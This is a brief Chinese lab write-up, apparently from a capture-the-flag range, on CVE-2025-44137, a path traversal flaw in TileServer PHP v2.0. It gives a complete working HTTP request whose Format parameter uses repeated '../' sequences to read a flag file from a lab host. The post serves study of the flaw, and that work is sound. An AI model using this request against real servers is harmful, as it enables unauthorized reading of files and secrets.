【春秋云境】CVE-2025-44137 TileServer PHP v2.0任意文件读取漏洞

1、靶场介绍

TileServer PHP是MapTiler开源的一个文件夹托管软件。 TileServer PHP v2.0版本存在安全漏洞,该漏洞源于renderTile函数允许路径遍历,可能导致读取任意文件

2、POC

yaml 复制代码
GET /tileserver.php/x/1/1/1?Format=/../../../../../../../../../../../../../../flag&Request=x&layer=. HTTP/1.1
Host: 39.106.48.123:26282
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive

3、总结

没什么总结的,从git上一搜就搜到POC了。

相关推荐
迎仔2 小时前
08-Apache Iceberg 通俗指南:给“胡乱堆放”的文件加个“智能账本”
apache·iceberg
王锋(oxwangfeng)21 小时前
Apache Flink 在 Kubernetes 上的高效部署与优化实践
flink·kubernetes·apache
小天源1 天前
银河麒麟操作系统 V10安装Apache Tomcat
apache
自可乐1 天前
Apache Airflow完全学习指南:从入门到精通的系统教程
人工智能·机器学习·apache
Hello.Reader1 天前
Apache Flink 网络 Buffer 调优Debloating 的边界、Buffer 生命周期
大数据·flink·apache
Hello.Reader1 天前
Apache Flink 内存故障排查从 IllegalConfigurationException 到 OOMKilled,一篇把坑踩平的指南
大数据·flink·apache
小宇的天下2 天前
Cadence allegro---assign net
服务器·php·apache
软件派3 天前
Apache Paimon终极教程——流批一体存储引擎深度解析(附Flink集成案例+性能调优代码)
apache·性能调优·流批一体·实时数据处理·paimon教程·flink集成·湖仓架构
三水不滴3 天前
Apache RocketMQ的原理与实践
经验分享·apache·rocketmq